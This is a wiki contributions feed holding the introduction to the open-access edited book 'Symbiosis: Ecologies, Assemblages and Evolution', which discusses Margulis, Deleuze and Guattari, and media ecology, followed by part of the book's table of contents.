<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en-GB">
	<id>https://livingbooksaboutlife.org/wiki/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Garyhall</id>
	<title>Living Books About Life - User contributions [en-gb]</title>
	<link rel="self" type="application/atom+xml" href="https://livingbooksaboutlife.org/wiki/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Garyhall"/>
	<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php/Special:Contributions/Garyhall"/>
	<updated>2026-04-22T08:04:00Z</updated>
	<subtitle>User contributions</subtitle>
	<generator>MediaWiki 1.41.0</generator>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Symbiosis/Introduction&amp;diff=5670</id>
		<title>Symbiosis/Introduction</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Symbiosis/Introduction&amp;diff=5670"/>
		<updated>2014-04-01T13:09:11Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/symbiosis Back to Contents of Symbiosis]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Image:Cladonia macilenta.jpg|182x200px|Cladonia macilenta]] [[Image:Amphiprion percula.JPG|265x200px|Amphiprion percula.JPG]] [[Image:PloverCrocodileSymbiosis.jpg|182x200px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Introduction: symbiosis as a living evolving critique'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Different species, interacting in a symbiotic fashion, living together over a prolonged period of time, eventually co-evolving into new species: this vision of the biological phenomenon of symbiosis has created a strong impression—both of symbiosis as a metaphor and a material reality—of species in an intimate relationship together, cooperating in spite of differences, of becoming something else and transgressing boundaries. This idea has turned the concept of symbiosis, in its many guises and definitions,[1] into a breeding ground for a posthuman, biologically and ecologically informed critique. Less focused on the biological process of symbiosis as such, our focus in ''Symbiosis: Ecologies, Assemblages and Evolution'' is more on how symbiosis can be used as a means to argue for an alternative worldview and even a better world. Interestingly, Angela Elizabeth Douglas notices a similar effect in her book ''The Symbiotic Habit'' (2010), where she talks about the growing importance of ‘applied symbiosis research’. Douglas refers above all to how research into symbiotic processes has the potential to help solve some of the practical problems mankind is facing through anthropogenically induced effects, such as climate change and environmental disasters; and in this way influence and improve (our) ecosystem(s) and make the world in which we live much healthier (Douglas, 2010: viii).&lt;br /&gt;
&lt;br /&gt;
This living book consists of a number of examples of how symbiosis has been deployed. For instance, as a critique of the mainstream Darwinian idea of evolution as struggle; of the anthropocentric worldview that operates within the sciences and society at large; and of the idea of organisms or objects as static and isolated entities. Given the way in which symbiotic processes offer seeds for alternative worldviews, research on symbiosis has been taken-up as providing evidence for becoming as an infinite creative process, for the (animal, microbal, machinic, and/or virtual) other as an integral part of the multiple I, and for the integrated cooperation of living and non-living affects as one interconnected mesh.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''Otherness, process, multiplicity and cooperation''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
For the biologist Lynn Margulis, (endo)symbiosis has been the major theme around which she has developed her—for some quite controversial—evolutionary biological research. In her book ''Symbiotic Planet: A New Look at Evolution'' (1999), Margulis states that in science there are still many (hidden) assumptions to the effect that man is the center of things and resides in the middle of the chain of evolution, ‘below god and above rock’ (Margulis, 1999: 8-9). However, as Margulis has argued in her revolutionary work on the importance of endosymbiosis for evolution, all life forms can be seen to have evolved from microbes, from (the interactions between) bacteria. In some cases symbiosis even evolves into symbiogenesis, when certain forms of long-term living together lead to the appearance of new species or new organs. Here, organisms merge with other organisms, acquiring their gene sets in the process (Margulis, 1999: 8-9). Margulis’ main claim, for which she draws on earlier work by the biologist Ivan Wallin amongst others, is thus that in most cases evolutionary novelty arises as a consequence of symbiosis, which goes directly against (or, in a less radical view, compliments) a Darwinian ‘nucleocentric view of evolution as a bloody struggle of animals (Margulis, 1999: 19-20). Margulis’ claims concerning symbiosis, and her use of the concept of symbiosis, have been seen as somewhat controversial and extreme within mainstream evolutionary biology, not only because of her insistence on symbiosis and evolutionary cooperation as an alternative theory to that of Darwinian struggle, but also due to her insistence that it was not just plants an animals that evolved from the interaction of microbes [2], but all life-forms. And as she herself puts it, ‘the idea that new species arise from symbiotic mergers among members of old ones is still not even discussed in polite scientific society’ (Margulis, 1999: 7).&lt;br /&gt;
&lt;br /&gt;
What makes Margulis even more suspect in some biological circles is the way her theory of symbiosis and symbiotic evolution has been adopted by New Age-inspired environmental and deep ecology movements; and how most importantly her use of symbiosis in biological discourse has been connected with James Lovelock’s Gaia hypothesis. The latter proposes a holistic view of the earth (Gaia) as a self-regulating whole of organic and inorganic matter, operating as a close unity by means of a feedback system. This idea is visible in many present-day ecosophies. However, the mixing of a near spiritual and religious rhetoric with scientific facts was not deemed intellectually serious by many biological researchers, and was regarded as being too harmonious and too regulated (instead of an unconscious mechanism), according to the ‘struggle as survival’ evolutionary strand of neo-darwinians.[3]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''Symbiotic becomings''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Developments in modern biology, including the new emphasis on the importance of symbiosis for evolution, played an important role in what has come to be characterized as poststructuralist and posthuman thinking. In particular, biologically oriented ‘earthly processes’ (as opposed to transcendental ideas) and new evolutionary theories were an influential reference point for the construction of the geophilosophy of Deleuze and Guatarri, in which the latter argue for a ‘virtually limitless connectivity between heterogeneous beings’ (Chisholm, 2007). However, Dianne Chisholm, in her reading of Deleuze and Guattari’s geophilosophy, strongly contrasts their theories with ideas connected to the Gaia hypothesis or holism. From Deleuze and Guattari’s perspective, disparate processes of symbiosis and evolution don’t resolve into a synthetic unity; rather, as Chisholm states, their philosophy ‘deterritorialize(s) Gaia's unified field’ (Chisholm, 2007).&lt;br /&gt;
&lt;br /&gt;
	Deleuze and Guattari use symbiotic processes in another way to ground their philosophy. Aspects of their symbiotic critique can be seen to be directed against ideas of classification by filiation, stable identity (instead of identity as becoming) and the single unified entity (as opposed to the self as a pack of multiplicities and assemblages). Using the concept of symbiosis, Deleuze and Guattari first of all critique modern science and the way it is only able to think in terms of filiations, of mimesis.[4] This critique of classification is also visible in Margulis’ work where she uses symbiosis to problematize the mainstream way of classifying species. She argues against oversimplified and dangerous categorizations into ‘plants, animals and germs’, arguing that in many cases differences between plants and animals are not that easy to make and, as she puts it, a ‘more scientific’ division can also be made between prokaryotic cells and eukaryotic cells, crushing the age-old divide between plants and animals (who are far more alike then they are presented as being in mainstream classifications) (Margulis, 1999: 56). Different, distinct kingdoms are thus, in the terminology of both Deleuze and Guattari and Margulis, hard to establish and maintain.&lt;br /&gt;
&lt;br /&gt;
	Deleuze and Guattari adopt a similar approach of using the concept of symbiosis to help critique classification and genealogical evolution when they discuss their idea of neoevolutionism. In a neoevolutionist approach classifications are not made according to filiation, or by imitating or identifying with something/someone, but by ‘transversal communications between heterogeneous populations’ (Deleuze and Guattari, 1988: 239). Chisholm summarises Deleuze and Guattari’s neoevolutionism as follows: ‘Instead of specific genealogical lineages of origin, selection, reproduction, and evolution, they map a non-teleological and unpredictable network of symbiotic alliances, trans-species affiliations, symbiogenesis, and co-evolution’ (Chisholm, 2007).&lt;br /&gt;
&lt;br /&gt;
Deleuze and Guattari thus propose a non-classification of becoming, preferring the term ‘involution’ for evolution between heterogeneous terms, as an alternative to ‘evolution’ (Deleuze and Guattari, 1988: 238-239). They specifically use symbiosis to explain their idea of becoming (which is rhizomatic and is directed against thinking in genealogies), where symbiosis can be seen as the underlying basis of their &amp;quot;creative involution.&amp;quot; As they state: ‘Becoming produces nothing by filiation; all filiation is imaginary. Becoming is always of a different order than filiation. It concerns alliance. If evolution includes any veritable becomings, it is in the domain of symbioses that bring into play beings of totally different scales and kingdoms, with no possible filiation’ (Deleuze and Guattari, 1988: 238-239). &lt;br /&gt;
&lt;br /&gt;
The critique of a static individual is something that is again also visible in biological research, where symbiosis has been used to challenge the boundaries of an organism. Margulis also states that every individual consists of multi-unit symbiotic individuals, as they continually merge to regulate their reproduction to generate new populations. She, like Deleuze and Guattari, speaks about how every ‘individual organism’ in a ‘species’ is ‘really a group, a membrane-bounded packet of microbes that looks like and acts as a single individual’ (Margulis, 1999: 11). This directly relates to Deleuze and Guattari’s idea that every animal is a band or a pack, which is very important for the concept of human becoming-animal, being fascinated by both the multiplicity outside us (the pack of animals) and the multiplicity that is already dwelling inside of us (Deleuze and Guattari, 1988: 239-240). Deleuze and Guattari’s non-classification of symbiotic becoming can be seen as a viral evolution, based on contagion (instead of heredity), where animals as packs originate, develop and transform by means of viral contagion (Deleuze and Guattari, 1988: 241).&lt;br /&gt;
&lt;br /&gt;
	Their vision of an individual is that it consists of an infinite multiplicity, where multiplicities made up of heterogeneous terms continuously transform or cross over into each other. Multiplicities co-functioning via a viral logic of contagion then enter into assemblages. Becoming and multiplicity basically mean the same thing in Deleuze and Guattari’s philosophy, and here again they use symbiosis to define and explain one of their core concepts:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;blockquote&amp;gt;Since its variations and dimensions are immanent to it, it amounts to the same thing to say that each multiplicity is already composed of heterogeneous terms in symbiosis, and that a multiplicity is continually transforming itself into a string of other multiplicities, according to its thresholds and doors (Deleuze and Guattari, 1988: 275).&amp;lt;/blockquote&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The concept of assemblage as applied in Deleuze and Guattari’s geophilosophy, can thus be seen to do away with the nature-culture distinction. Assemblages also incorporate non-organic matter. Tools as instruments get incorporated into and are inseparable from the assemblage, creating a machinic phylum. In this manner humans are also related to non-living/non-organic beings through assemblages. An assemblage keeps different types of objects, heterogeneous elements, together; objects and elements that continuously enter into relations with one another, where the affects of a body enter into composition with other affects. This entering of affects again has a symbiotic character:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;blockquote&amp;gt;We know nothing about a body until we know what it can do, in other words, what its affects are, how they can or cannot enter into composition with other affects, with the affects of another body, either to destroy that body or to be destroyed by it, either to exchange actions and passions with it or to join with it in composing a more powerful body (Deleuze and Guattari, 1988: 256).&amp;lt;/blockquote&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Chisholm remarks that these kind of machinic assemblages, or symbiosis with inorganic life, are the vitalist element behind creating more life in a non-reproductive way. Symbiotic couplings or machinic assemblage between unlike things create something other than themselves, something more creative (Chisholm, 2007).&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
	''Symbiotic systems and ecologies''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
In both systems theory and media studies a symbiotic critique following the idea of machinic assemblages can be seen to have gained ground, arguing for the importance of seeing non-organic processes and nature-culture assemblages as inherent to information-processing entities. In research into media ecologies media are seen, in a symbiotic fashion, as cooperating open systems, producing something more through their interactions than (the sum of) their separate parts. Thus Matthew Fuller, in his book on ''Media Ecology'', uses Deleuze and Guattari’s concept of the machinic phylum to describe the tension between the discrete parts of a specific medium or a specific media ecology and their multiplicitous becomings. From this point of view, media should be seen as complex dynamical systems (ecologies), as networks of objects and processes, and it is their interconnectedness that we should be interested in (Fuller, 2005: 6). Similarly, Jussi Parikka, in his volume ''Insect Media'', is interested in the intertwining of animals and technology. Like Fuller, he is not interested in studying media as fixed substances but in their becomings (exploring media archaeology). These machinic assemblages are in Parikka’s work not merely metaphoric suggestions, but function as a means to rethink the material basis of media and how matter can be seen as an active agent. Media can thus be seen as ‘a realms of affects, potentials and energetics’ (Parikka, 2010: xxvii). Media bodies emerge as part of the environments in which they are embedded, interconnected through their intensive capabilities. In this sense, as Parikka states, we (humans, animals, insects, bacteria) are all media and are of media, arguing for a vision on media ecologies that is more inclusive (Parikka, 2010: xxvii).&lt;br /&gt;
&lt;br /&gt;
Van Loon argues for a similar emphasis on the material basis of media over and above merely metaphorical imagery, when he discusses the importance of symbiotic processes to any understanding of the interactions in (complex) systems theory. Not only does biology and science as such use symbiosis as a metaphor too, Van Loon argues that political processes are no less real than let’s say bacteria. As he states:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;blockquote&amp;gt;The point to make here is simply that if we understand that the basic process in symbiosis is a form of interaction between two or more different information processing systems, that in turn work to manipulate and modify their environment according to better their chances of survival, than it should become clear that this includes both organic and inorganic information-processing systems (Van Loon, 1999).&amp;lt;/blockquote&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Van Loon explains how in systems theory, symbiosis has been used to show how evolution through associations can explain how new organisms ‘emerge’ far more effectively than natural selection. In opposition  to a systems theory based on natural selection, Van Loon argues that such a politics of survival can be seen as fascist as it privileges the autonomy of the individual over that of the community. Complex systems always arise through symbiosis as they are assemblages of information-processing devices. Van Loon goes on to show how community as it emerges, functions and evolves via a symbiotic parasite politics, a parasite politics that can be seen as the essence of a community. Here he regards the parasite as ‘the other’ that makes up the community-in-difference (Van Loon, 1999).&lt;br /&gt;
&lt;br /&gt;
	This living book forms another machinic assemblage between heterogenous and discrete information-processing entities. Within it you will find a collection of media resources, interacting in and within a wider media ecology, resources that apply symbiotic critique within their particular networks. That is to say, they use symbiotic processes to argue for a different worldview. Brought together in this living book they merge and form symbiotic alliances from which they will continue to evolve.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''Evolution, ecology, posthumanism and augmentation''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
This living book is divided in four sections. The first part of ''Symbiosis: Ecologies, Assemblages and Evolution'' looks at symbiosis as an evolutionary process, the second part at the relationship between symbiosis and ecology, the third at the role symbiosis played in discourses on the posthuman. The fourth part of the book then provides a more speculative glance into a future of augmented and virtual reality and an evolving symbiosis between the virtual and the real.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Part one of ''Symbiosis: Ecologies, Assemblages and Evolution'', which focuses on ''Symbiosis and Evolution'', contains two articles that serve as both an introduction to, and an example of, symbiosis. The first of these, ‘How Symbiosis can Guide Evolution’, is an example of the use of the concept of symbiosis to battle by (neo)Darwinism inspired theories of evolution. It describes the creation of a computational model that shows how the formation of symbiotic relations in a given ecosystem influences genetic variation. It is followed by Fabio Lucian and Samuel Alizon’s ‘The Evolutionary Dynamics of a Rapidly Mutating Virus within and between Hosts: The Case of Hepatitis C Virus’, which looks at the evolution of the Hepatitus C virus in a within-host environment, describing the parasitic relationship of the virus with the host-body.&lt;br /&gt;
&lt;br /&gt;
	The second set of articles in the part on ''Symbiosis and Evolution'' then looks at the process of endosymbiosis (symbiosis inside the body/cell) in particular. The article by Xu et al. looks at the evolution of symbiotic bacteria in the human intestine and the article by Wernegreen looks at the interactions (via associations or genetic conflicts) of bacteria within and with insects, and the possibility of genetic manipulation in this evolutionary interaction.&lt;br /&gt;
&lt;br /&gt;
	Finally, the third set of articles in the part on ''Symbiosis and Evolution'' looks at the origin of the theory of symbiogenesis, incorporating the seminal 1927 book Symbionticism and the origin of species by American biologist Ivan Wallin, which made the then highly controversial claim that cells evolved by symbionticism, by the formation of microsymbiotic complexes. In this book Wallin describes the emergence of mitochondria as the incorporation of independent bacteria inside of existing cells, which evolved to what we now know as organelles. In an overview article, biologist Lynn Margulis goes back to the origin of the theory of symbiogenesis (and to Wallin and his Russian colleagues) to explore the roots of her own work and the development of her groundbreaking Serial Endosymbiosis Theory (SET) at the same time.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The second part of this liquid book looks at the relationship of symbiosis with ecology. In the opening section on community ecology, the article 'The Roles and Interactions of Symbiont, Host and Environment in Defining Coral Fitness', looks at the complex interactions between the coral host, the algal symbiont, and the environment, and the role symbionts play in this community ecology with respect to the community’s (the coral holobiont’s) fitness, and their ability to determine what the effects of global climate change on this ecology might be. An important aspect of many discourses surrounding ecology is the upkeep of the level of biodiversity and complexity of a given system or ecology. The article by Toft, Williams, and Fares, looks at this aspect of biodiversity as a measure of the health of ecosystems and the role symbiosis (especially with respect to the way proteobacteria interact with insects) plays in generating species diversity.&lt;br /&gt;
&lt;br /&gt;
	Symbiosis also plays a role in those discourses surrounding ecology that go beyond a single community or ecological system to focus instead on the ecosystem that makes up the world as a whole. The notion of the world functioning as one big ecosystem is reflected in Timothy Morton’s work and the importance he gives to the idea of interconnectedness. Echoing processes of symbiosis, his concept of the Mesh is set up against nature-culture distinctions, but focuses on the interconnectedness of existence,  seeing existence as first of all a co-existence.&lt;br /&gt;
&lt;br /&gt;
	Symbiosis has also been influential in the previously mentioned Gaia hypothesis. Here symbiosis, ecology and interconnectedness are taken to a point of spiritual culmination where the whole biosphere can be seen as a single complex planetary system consisting of organic and inorganic components. In The Systems View of Life, a chapter from his book The Turning Point, Capra looks at these interrelationships from a systems point of view, seeing living organisms as open systems, functioning in their interactions with others and their environment on different levels of the overall system. Stephen B. Scharper, in his overview article on Gaia, reviews theories by Lovelock, Margulis and others that have concentrated on the idea of the earth as a living organism. He focuses amongst other things on the way Gaia combined scientific discoveries with a ‘religious imagination’. Timothy Morton, in his podcast on Lynn Margulis and Gaia, notes the differences between her view on symbiosis and the way it was adopted in Gaia Theory.&lt;br /&gt;
&lt;br /&gt;
	This part of the book on ''Symbiosis and Ecology'' ends with Matthew Fuller’s Media Ecologies, in which he adapts the concept of ecology to media, showing how media as interacting objects, and media systems, function as ecologies. Like different species interacting in a symbiotic way to create new species, Fuller shows how a mobile phone, for instance, can be seen as a ‘media assemblage’.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The third part of the book on ''Symbiosis and Posthumanism'', looks at the influence of symbiosis on thinking about non-organic matter and its interactions with organic matter. Symbiosis has played an important role in discourses on the posthuman: for instance, in Lickliders seminal speculative paper on the possibilities of man-machine symbiosis. Schalk updates Licklider’s article, using contemporary developments in computing and information processing to show how Licklider’s utopian vision was not so much utopian as making a case for technological improvements. Schalk argues that brain-computer symbiosis or partnerships are a logical step in the course of our evolution.&lt;br /&gt;
&lt;br /&gt;
	The next section on ''Symbiotic Intelligence'' expands on the possibility of symbiotic intelligence by combining computing with (neural) networks. The article that opens this section, Forming Neural Networks Through Efficient and Adaptive Coevolution, by Moriarty and Miikkulainen, discusses a novel neuroevolutionary approach to mobile robotics using the Symbiotic Adaptive NeuroEvolution system (SANE). It argues for the benefits of using co-evolutionary algorithms to solve complex control problems. The importance of dynamic or distributed problem-solving, of ‘collective decision making’ and symbiotic intelligence is also discussed in Johnson’s overview of symbiotic intelligence and human-net interactions.&lt;br /&gt;
&lt;br /&gt;
	Another aspect of the importance of symbiosis is discussed in the paper by Bhan et al. on human-animal symbiosis resulting in chimeras (human-animal hybrids). This article discusses the importance that the development of chimeras could play in vaccine development, were it not for the strong ethical problems involved in this form of symbiotic evolution.&lt;br /&gt;
&lt;br /&gt;
	The last section in this part of the book looks at machine-nature interactions. Here Schhuppli’s article ‘Of Mice Moths and Men Machines’, describes the coevolution of machine’s with living matter through the example of Hopper’s bug, arguing that mutations, chaos and viral infections are necessary for systems to survive and evolve. Jussi Parikka, in his essay on digital monsters and binary aliens, goes deeper into this discourse of the viral as a negative control-issue in the present capitalist system. He shows how on the other hand capitalism itself is integrally viral. Parikka explores these contradictory themes of the viral as the enemy of capitalism and at the same time integral to its logic of expansion, positioning them as two intertwined discourses.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The final part of the book on ''Symbiosis and Augmentation'' looks at possibilities for both augmenting man with machinic prosthetic tools via neural networks, and for augmenting reality with overlaid or augmented virtual worlds. The article ‘Exploiting co-adaptation for the design of symbiotic neuroprosthetic assistants’, by Sanchez et al. looks at the incorporation via the brain of neuro-prosthetic tools through neurological networks. This can be seen as an example of human-tool symbiosis where, through the cognitive space of the brain, tools can be used as extensions or ‘enhancements’ of the body. &lt;br /&gt;
&lt;br /&gt;
	The book’s final part ends with a poetic experiment involving text and bacteria and with two descriptions of media art, which experiment, with the symbiosis between the real and the virtual. ‘Carrier Becoming Symborg’, which is the title of a piece and text by Melinda Rackham, looks at the viral merging of biological code and source code. Her electronic literature piece about the Hepatitis C virus describes both life and literature as an infectious viral agent. Meanwhile Mitchell Whitelaw examines the work of Any Gracie and other examples of the bio/tech hybrid in media art, and talks about the importance of symbiosis in Gracie’s work: we when, for example, he creates augmented worlds in which real and virtual bacteria interact (in Autoinducer_Ph-1). Christian Bök in 'The Xenotext Experiment', describes his proposal for having a text living as a parasite within the cells of another life-form, by encoding a short verse from a poem into a sequence of DNA in order to implant it into a bacterium.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''Epilogue: The Symbiotic Book''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
We should stress that this living book is also a symbiotic book. It is a merging and co-habitation of different media-species, a mash-up of text and video, sound and images, pixels and living, material tissue. The digital medium has in many ways made it possible for the book to become increasingly infected with foreign (non-textual) elements as it evolves into something different; into a becoming which might even lead to the disappearance of the book as we currently know it and to the rise of a new symbiotic book-evolved hybrid species. &lt;br /&gt;
&lt;br /&gt;
	In this context this symbiotic book on symbiosis also constitutes a tool for a critique which is directed  at visions of the book which position it as a static, stable entity, a lifeless thing made out of dead trees. As a concept the symbiotic book argues for the book as becoming, as infinitely transforming and interacting and crossing over into other books and other discourses, a machinic assemblage of various discrete media entities, all of them interconnected. In this vision the networked, liquid books in the Living Books About Life series form an ecology of information, one that growes stronger and expands in mutual cooperation. Cooperation as books, as ‘lifeless entities’, or non-organic matter, also takes places with and via the living, with the human assemblages who create the books, feed into them, and make them part of the networks through which they algorithmically spread over the web, keeping the book alive, keeping it social.&lt;br /&gt;
&lt;br /&gt;
	The symbiotic book crosses boundaries, between the life sciences and the humanities, but also between the scholarly world and society at large, thus making it open for infection, for re-use, for remixing and change. The symbiotic book still has borders, though. Evolution is a slow process, heavily influenced by environmental and cultural barriers. Nevertheless, maybe some genetic modification might be beneficial in this respect.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Endnotes'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
1.	About the lack of a uniform definition with respect to symbiosis, see: Douglas, A.E. (2010) The Symbiotic Habit. Princeton: Princeton University Press, 4-5.&lt;br /&gt;
&lt;br /&gt;
2.	Margulis explains how symbiosis over a prolonged period of time led first to the evolution of complex cells with nuclei and then from there led to the evolution of other organisms such as fungi, plants, and animals (Margulis, 1999: 6).&lt;br /&gt;
&lt;br /&gt;
3.	For an overview of scientific criticism on the Gaia hypothesis, see: Scharper, S.B. (1997) Redeeming the Time: A Political Theology of the Environment. New York: The Continuum International Publishing Group Inc., 53-54.&lt;br /&gt;
&lt;br /&gt;
4.	As they state: Natural history can think only in terms of relationships (between A and B), not in terms of production (from A to x). Deleuze, G and Guattari, F. (1988) A thousand plateaus: capitalism and schizophrenia. Minneapolis: University of Minnesota Press, 234-235.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''References'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Chisholm, D. (2007) ‘Rhizome, Ecology, Geophilosophy (A Map to this Issue).’ ''Rhizomes: Cultural Studies in Emerging Knowledge'', rhizomes.150 (winter).&lt;br /&gt;
&lt;br /&gt;
Deleuze, G and Guattari, F. (1988) ''A thousand plateaus: capitalism and schizophrenia.'' Minneapolis: University of Minnesota Press.&lt;br /&gt;
 &lt;br /&gt;
Douglas, A.E. (2010) ''The Symbiotic Habit.'' Princeton: Princeton University Press.&lt;br /&gt;
&lt;br /&gt;
Fuller, M. (2005) ''Media Ecologies: Materialist Energies in Art and Technoculture.'' Cambridge: MIT Press.&lt;br /&gt;
&lt;br /&gt;
Margulis, L. (1999) ''Symbiotic planet: a new look at evolution.'' Basic Books.&lt;br /&gt;
&lt;br /&gt;
Parikka, J. (2010) ''Insect media. An archaeology of animals and technology.'' Minneapolis: University of Minnesota Press.&lt;br /&gt;
&lt;br /&gt;
Scharper, S.B. (1997) ''Redeeming the Time: A Political Theology of the Environment.'' New York: The Continuum International Publishing Group Inc.&lt;br /&gt;
&lt;br /&gt;
Van Loon, J. (1999) ‘Parasite-politics: on the significance of symbiosis and assemblage in theorizing community-formations’, in Chris Pierson and Simon Tormey (eds), ''Politics at the Edge.'' The PSA Yearbook.&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Symbiosis&amp;diff=5669</id>
		<title>Symbiosis</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Symbiosis&amp;diff=5669"/>
		<updated>2014-04-01T13:08:25Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: /* Introduction: Symbiosis as a Living Evolving Critique */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Image:Symbiosis1.jpg|right|318x450px|Symbiosis1.jpg]]&lt;br /&gt;
Ecologies, Assemblages and Evolution&lt;br /&gt;
&lt;br /&gt;
[http://www.livingbooksaboutlife.org/books/ISBN_Numbers ISBN: 978-1-60785-271-1]&lt;br /&gt;
&lt;br /&gt;
''edited by'' [http://www.livingbooksaboutlife.org/books/Symbiosis/bio Janneke Adema and Pete Woodbridge]&lt;br /&gt;
__TOC__&lt;br /&gt;
== [http://www.livingbooksaboutlife.org/books/Symbiosis/Introduction Introduction: Symbiosis as a Living Evolving Critique]  ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;youtube&amp;gt;FPGH7pk5RlQ&amp;lt;/youtube&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Different species, interacting in a symbiotic fashion, living together over a prolonged period of time, eventually co-evolving into new species: this vision of the biological phenomenon of symbiosis has created a strong impression—both of symbiosis as a metaphor and a material reality—of species in an intimate relationship together, cooperating in spite of differences, of becoming something else and transgressing boundaries. This idea has turned the concept of symbiosis, in its many guises and definitions, into a breeding ground for a posthuman, biologically and ecologically informed critique. Less focused on the biological process of symbiosis as such, our focus in Symbiosis: Ecologies, Assemblages and Evolution is more on how symbiosis can be used as a means to argue for an alternative worldview and even a better world.... ([http://www.livingbooksaboutlife.org/books/Symbiosis/Introduction more])&lt;br /&gt;
&lt;br /&gt;
== Symbiosis and Evolution  ==&lt;br /&gt;
{{#widget:Vimeo|id=7461457}} &lt;br /&gt;
&lt;br /&gt;
; Watson, R. A. and Pollack, J. B. : [http://eprints.ecs.soton.ac.uk/12009/ How Symbiosis Can Guide Evolution] &lt;br /&gt;
; Fabio Lucian and Samuel Alizon : [http://www.ploscompbiol.org/article/info%3Adoi%2F10.1371%2Fjournal.pcbi.1000565 The Evolutionary Dynamics of a Rapidly Mutating Virus within and between Hosts: The Case of Hepatitis C Virus ] &lt;br /&gt;
; Wired Science : [http://www.wired.com/wiredscience/2010/01/green-sea-slug/ Green Sea Slug Is Part Animal, Part Plant] &lt;br /&gt;
&lt;br /&gt;
=== Endosymbiosis  ===&lt;br /&gt;
&lt;br /&gt;
[[Image:Endosymbiosis.PNG|249x270px|Endosymbiosis.PNG]] &lt;br /&gt;
&lt;br /&gt;
; Jian Xu, Michael A. Mahowald, Ruth E. Ley et.al. : [http://www.plosbiology.org/article/info%3Adoi%2F10.1371%2Fjournal.pbio.0050156 Evolution of Symbiotic Bacteria in the Distal Human Intestine] &lt;br /&gt;
&lt;br /&gt;
; Jennifer J. Wernegreen : [http://www.plosbiology.org/article/info:doi/10.1371/journal.pbio.0020068 Endosymbiosis: Lessons in Conflict Resolution]&lt;br /&gt;
&lt;br /&gt;
=== Symbiogenetics ===&lt;br /&gt;
; Lynn Margulis : [http://books.google.com/books?id=3sKzeiHUIUQC&amp;amp;lpg=PP1&amp;amp;dq=inauthor%3A%22Lynn%20Margulis%22&amp;amp;pg=PA1#v=onepage&amp;amp;q&amp;amp;f=false Symbiogenesis and Symbionticism]&lt;br /&gt;
; Ivan Emmanuel Wallin : [http://www.archive.org/download/symbionticismori00wall/symbionticismori00wall.pdf Symbionticism and the origin of species (1927)]&lt;br /&gt;
&lt;br /&gt;
== Symbiosis and Ecology  ==&lt;br /&gt;
=== Community Ecology ===&lt;br /&gt;
; Jos C. Mieog, Jeanine L. Olsen, Ray Berkelmans et.al. : [http://www.plosone.org/article/info:doi%2F10.1371%2Fjournal.pone.0006364 The Roles and Interactions of Symbiont, Host and Environment in Defining Coral Fitness] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;youtube&amp;gt;hbveXyfIllY&amp;lt;/youtube&amp;gt; &amp;lt;youtube&amp;gt;LBR4pEC7kwU&amp;lt;/youtube&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Biodiversity and complexity  ===&lt;br /&gt;
; Christina Toft, Tom A. Williams, and Mario A. Fares : [http://www.ploscompbiol.org/article/info%3Adoi%2F10.1371%2Fjournal.pcbi.1000344 Genome-Wide Functional Divergence after the Symbiosis of Proteobacteria with Insects Unraveled through a Novel Computational Approach]&lt;br /&gt;
&lt;br /&gt;
=== Interdependence ===&lt;br /&gt;
; Timothy Morton – Thinking Ecology&amp;lt;nowiki&amp;gt;:&amp;lt;/nowiki&amp;gt; The Mesh Part 1: &amp;lt;youtube&amp;gt;R-mWCPa9y3c&amp;lt;/youtube&amp;gt;&lt;br /&gt;
; Timothy Morton – : [http://www.youtube.com/watch?v=viiA5s8DV7I Thinking Ecology: The Mesh Part 2]&lt;br /&gt;
; Timothy Morton –  : [http://www.youtube.com/watch?v=BNl6fOd26Q0 Thinking Ecology: The Mesh Part 3]&lt;br /&gt;
&lt;br /&gt;
=== Life Systems and Gaia Hypothesis ===&lt;br /&gt;
; Fritjof Capra : [http://www.mountainman.com.au/f_capra.html The Turning Point: Chapter on the Systems View of Life] &lt;br /&gt;
